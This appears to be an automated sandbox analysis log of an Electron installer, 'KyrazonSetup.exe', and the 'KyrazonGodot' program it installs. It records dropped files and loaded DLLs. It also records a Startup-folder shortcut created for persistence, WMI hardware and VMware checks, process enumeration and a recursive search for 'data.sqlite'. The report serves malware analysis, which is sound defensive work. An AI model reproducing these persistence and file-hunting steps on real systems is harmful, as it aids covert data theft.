Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: kbdus.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\where.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq KyrazonGodot.exe" /FO csv
Source: KyrazonGodot.lnk.12.dr LNK file: ..\..\..\..\..\..\Local\Programs\KyrazonGodot\KyrazonGodot.exe
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\KyrazonSetup.exe Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\b3cf5a4f-183c-5906-ad23-5f1f95ad8d0e
Source: KyrazonSetup.exe Static file information: File size 80239576 > 1048576
Source: KyrazonSetup.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: D3DCompiler_47.pdb source: KyrazonSetup.exe, 00000000.00000003.1806828851.0000000004FA5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\projects\src\out\Default\libEGL.dll.pdb source: KyrazonSetup.exe, 00000000.00000003.1861082432.000000000078C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\projects\src\out\Default\ffmpeg.dll.pdb source: KyrazonSetup.exe, 00000000.00000003.1808616840.0000000004FA8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D3DCompiler_47.pdbGCTL source: KyrazonSetup.exe, 00000000.00000003.1806828851.0000000004FA5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\projects\src\out\Default\vk_swiftshader.dll.pdb source: KyrazonSetup.exe, 00000000.00000003.1864822801.0000000004FA2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\projects\src\out\Default\vulkan-1.dll.pdb source: KyrazonSetup.exe, 00000000.00000003.1803630374.0000000005600000.00000004.00001000.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1803339063.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1803837379.000000000564F000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe Code function: 12_2_00406DDD LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,12_2_00406DDD
Source: KyrazonGodot.exe.0.dr Static PE information: section name: .00cfg
Source: KyrazonGodot.exe.0.dr Static PE information: section name: .gxfg
Source: KyrazonGodot.exe.0.dr Static PE information: section name: .retplne
Source: KyrazonGodot.exe.0.dr Static PE information: section name: .rodata
Source: KyrazonGodot.exe.0.dr Static PE information: section name: CPADinfo
Source: KyrazonGodot.exe.0.dr Static PE information: section name: LZMADEC
Source: KyrazonGodot.exe.0.dr Static PE information: section name: _RDATA
Source: KyrazonGodot.exe.0.dr Static PE information: section name: malloc_h
Source: ffmpeg.dll.0.dr Static PE information: section name: .00cfg
Source: ffmpeg.dll.0.dr Static PE information: section name: .gxfg
Source: ffmpeg.dll.0.dr Static PE information: section name: .retplne
Source: ffmpeg.dll.0.dr Static PE information: section name: _RDATA
Source: KyrazonGodot.exe0.0.dr Static PE information: section name: .00cfg
Source: KyrazonGodot.exe0.0.dr Static PE information: section name: .gxfg
Source: KyrazonGodot.exe0.0.dr Static PE information: section name: .retplne
Source: KyrazonGodot.exe0.0.dr Static PE information: section name: .rodata
Source: KyrazonGodot.exe0.0.dr Static PE information: section name: CPADinfo
Source: KyrazonGodot.exe0.0.dr Static PE information: section name: LZMADEC
Source: KyrazonGodot.exe0.0.dr Static PE information: section name: _RDATA
Source: KyrazonGodot.exe0.0.dr Static PE information: section name: malloc_h
Source: libEGL.dll.0.dr Static PE information: section name: .00cfg
Source: libEGL.dll.0.dr Static PE information: section name: .gxfg
Source: libEGL.dll.0.dr Static PE information: section name: .retplne
Source: libEGL.dll.0.dr Static PE information: section name: _RDATA
Source: libGLESv2.dll.0.dr Static PE information: section name: .00cfg
Source: libGLESv2.dll.0.dr Static PE information: section name: .gxfg
Source: libGLESv2.dll.0.dr Static PE information: section name: .retplne
Source: libGLESv2.dll.0.dr Static PE information: section name: _RDATA
Source: vk_swiftshader.dll.0.dr Static PE information: section name: .00cfg
Source: vk_swiftshader.dll.0.dr Static PE information: section name: .gxfg
Source: vk_swiftshader.dll.0.dr Static PE information: section name: .retplne
Source: vk_swiftshader.dll.0.dr Static PE information: section name: _RDATA
Source: vulkan-1.dll.0.dr Static PE information: section name: .00cfg
Source: vulkan-1.dll.0.dr Static PE information: section name: .gxfg
Source: vulkan-1.dll.0.dr Static PE information: section name: .retplne
Source: vulkan-1.dll.0.dr Static PE information: section name: _RDATA
Source: ffmpeg.dll0.0.dr Static PE information: section name: .00cfg
Source: ffmpeg.dll0.0.dr Static PE information: section name: .gxfg
Source: ffmpeg.dll0.0.dr Static PE information: section name: .retplne
Source: ffmpeg.dll0.0.dr Static PE information: section name: _RDATA
Source: 5ec3d08a-7ef2-4ee9-8eab-fef225a068c8.tmp.node.6.dr Static PE information: section name: _RDATA
Source: 826b8686-c1e5-48d8-8e12-62caf060804a.tmp.node.6.dr Static PE information: section name: _RDATA
Source: 2714d126-6dff-4bf4-9f31-b75695222b09.tmp.node.48.dr Static PE information: section name: _RDATA
Source: aad38a22-07e7-47f5-a3a4-73babbf006a9.tmp.node.48.dr Static PE information: section name: _RDATA
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe Code function: 12_2_00405760 push eax; ret 12_2_0040578E
Source: C:\Users\user\Desktop\KyrazonSetup.exe File created: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\StdUtils.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe File created: C:\Users\user\AppData\Local\Temp\826b8686-c1e5-48d8-8e12-62caf060804a.tmp.node
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe File created: C:\Users\user\AppData\Local\Temp\2714d126-6dff-4bf4-9f31-b75695222b09.tmp.node
Source: C:\Users\user\Desktop\KyrazonSetup.exe File created: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\vulkan-1.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe File created: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\System.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe File created: C:\Users\user\AppData\Local\Temp\5ec3d08a-7ef2-4ee9-8eab-fef225a068c8.tmp.node
Source: C:\Users\user\Desktop\KyrazonSetup.exe File created: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\SpiderBanner.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe File created: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\libGLESv2.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe File created: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe
Source: C:\Users\user\Desktop\KyrazonSetup.exe File created: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\KyrazonGodot.exe
Source: C:\Users\user\Desktop\KyrazonSetup.exe File created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe
Source: C:\Users\user\Desktop\KyrazonSetup.exe File created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\ffmpeg.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe File created: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\d3dcompiler_47.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe File created: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\nsExec.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe File created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\d3dcompiler_47.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe File created: C:\Users\user\AppData\Local\Temp\aad38a22-07e7-47f5-a3a4-73babbf006a9.tmp.node
Source: C:\Users\user\Desktop\KyrazonSetup.exe File created: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\nsis7z.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe File created: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\elevate.exe
Source: C:\Users\user\Desktop\KyrazonSetup.exe File created: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\libEGL.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe File created: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\ffmpeg.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe File created: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\vk_swiftshader.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe File created: C:\Users\user\AppData\Local\Temp\826b8686-c1e5-48d8-8e12-62caf060804a.tmp.node
Source: C:\Users\user\Desktop\KyrazonSetup.exe File created: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\LICENSE.electron.txt
Source: C:\Users\user\Desktop\KyrazonSetup.exe File created: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\ReadMe.txt
Source: C:\Users\user\Desktop\KyrazonSetup.exe File created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\LICENSE.electron.txt
Source: C:\Users\user\Desktop\KyrazonSetup.exe File created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\ReadMe.txt
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KyrazonGodot.lnk
Source: C:\Users\user\Desktop\KyrazonSetup.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\where.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\826b8686-c1e5-48d8-8e12-62caf060804a.tmp.node
Source: C:\Users\user\Desktop\KyrazonSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\StdUtils.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2714d126-6dff-4bf4-9f31-b75695222b09.tmp.node
Source: C:\Users\user\Desktop\KyrazonSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\vulkan-1.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\System.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5ec3d08a-7ef2-4ee9-8eab-fef225a068c8.tmp.node
Source: C:\Users\user\Desktop\KyrazonSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\libGLESv2.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\SpiderBanner.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\d3dcompiler_47.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\nsExec.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\KyrazonGodot\d3dcompiler_47.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\aad38a22-07e7-47f5-a3a4-73babbf006a9.tmp.node
Source: C:\Users\user\Desktop\KyrazonSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\elevate.exe
Source: C:\Users\user\Desktop\KyrazonSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\nsis7z.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\libEGL.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\vk_swiftshader.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe API coverage: 8.5 %
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809
Source: C:\Windows\SysWOW64\find.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\SysWOW64\find.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\KyrazonSetup.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\KyrazonSetup.exe Code function: 0_2_00405768 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405768
Source: C:\Users\user\Desktop\KyrazonSetup.exe Code function: 0_2_004062A3 FindFirstFileA,FindClose,0_2_004062A3
Source: C:\Users\user\Desktop\KyrazonSetup.exe Code function: 0_2_004026FE FindFirstFileA,0_2_004026FE
Source: C:\Users\user\Desktop\KyrazonSetup.exe File opened: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources
Source: C:\Users\user\Desktop\KyrazonSetup.exe File opened: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib
Source: C:\Users\user\Desktop\KyrazonSetup.exe File opened: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\app.asar.unpacked\node_modules
Source: C:\Users\user\Desktop\KyrazonSetup.exe File opened: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\app.asar.unpacked
Source: C:\Users\user\Desktop\KyrazonSetup.exe File opened: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\app.asar.unpacked\node_modules\windows-shortcuts
Source: C:\Users\user\Desktop\KyrazonSetup.exe File opened: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\locales
Source: KyrazonSetup.exe, 00000000.00000003.1808616840.0000000004FA8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmncVMware Screen Codec / VMware Videovp5On2 VP5vp6On2 VP6vp6fOn2 VP6 (Flash version)targaTruevision Targa imageimage/x-targaimage/x-tgab
Source: KyrazonSetup.exe, 00000000.00000002.1921293457.0000000002B16000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: {53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8
Source: KyrazonSetup.exe, 00000000.00000002.1921293457.0000000002ADB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a
Source: KyrazonSetup.exe, 00000000.00000003.1808616840.0000000004FA8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware Screen Codec / VMware Video
Source: C:\Users\user\Desktop\KyrazonSetup.exe API call chain: ExitProcess graph end node graph_0-3180
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe API call chain: ExitProcess graph end node graph_12-3626
Source: C:\Users\user\Desktop\KyrazonSetup.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe Code function: 12_2_00406DDD LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,12_2_00406DDD
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\KyrazonSetup.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq KyrazonGodot.exe" /FO csv | "C:\Windows\system32\find.exe" "KyrazonGodot.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq KyrazonGodot.exe" /FO csv
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\find.exe "C:\Windows\system32\find.exe" "KyrazonGodot.exe"
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Process created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe "C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\KyrazonGodot" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1748 --field-trial-handle=1752,i,6861512032431707821,4936876543960781282,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Process created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe /A:C "/F:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KyrazonGodot.lnk" /T:C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "where /r . data.sqlite"
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Process created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe "C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\KyrazonGodot" --mojo-platform-channel-handle=2364 --field-trial-handle=1752,i,6861512032431707821,4936876543960781282,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
